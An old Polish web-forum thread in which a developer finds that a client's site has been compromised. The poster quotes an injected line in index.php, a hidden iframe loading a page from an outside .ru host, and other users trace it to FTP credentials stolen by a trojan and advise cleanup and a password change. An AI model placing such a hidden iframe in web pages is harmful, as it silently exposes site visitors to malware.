wirus na serwerze czy blad w skrypcie?

pxl666

2009-07-12 11:51

witam

zrobilem klientowi stronke i po dwoch dniach zamiast serwisu wyswietla sie to:

Parse error: syntax error, unexpected T_STRING in /home/rabatnet/public_html/index.php on line 108

lukam na linie 108 i widze:

<iframe src="http://u9j.ru:8080/index.php" width=129 height=151 style="visibility: hidden"></iframe>

czy to wirus/trojak na serwie czy cos w qcms??

pzdr

» Quick.Cms v2.x

Makaron

2009-07-13 08:43

To jakiś doklejony kod. Najlepiej będzie jak zmienisz dostęp do ftp i wywalisz tą linię.

pxl666

2009-07-13 09:29

a jakis pomysl skad sie to moglo wziac? zamienilem index.php i gra ale niewiem na jak dlugo...

Makaron

2009-07-13 12:53

Słyszeliśmy już o takich przypadkach. Sądzimy, że przyczyną mogą być trojany na komputerze, które w stosunkowo łatwy sposób mogą dostać się do pliku, w którym klient ftp przechowuje dostępy do kont i w ten sposób mogą się tam dostawać i wklejać tego typu złośliwce.

pxl666

2009-07-13 14:18

czyli przyczyna moze byc infekcja na moim kompie? uzywam avasta - moze lekki OT ale ktorys z kolegow moze polecic jakies sensowne rozwiazanie w tym temacie? zmiana hasla dostepu na ftp cos pomoze?

egame

2009-07-16 10:18

Przede wszystkim to jest problem z wirusem na kompie z którego logowałeś sie ftpem.

Więc zacznij od usunięcia źródła- czyli wirusa.
Jak zaobserwowałem w logach - doklejenie tego typu kodu nastepuje z serwerów głównie z ameryki południowej. Wiec wirus przesyła hasła dalej i jakies boty doklejaja kod.
Kolejna sprawa więc to zmiana hasła do ftp aby te serwery nie mogły znów dopisac złośliwego kodu.
Najważniejsze! Skąd ten wirus zna te hasła? Kojarzysz funkcje w programie ftp "zapamiętaj hasło" ? Od teraz jej nie używaj!!!

pxl666

2009-07-16 14:05

dzieki wielkie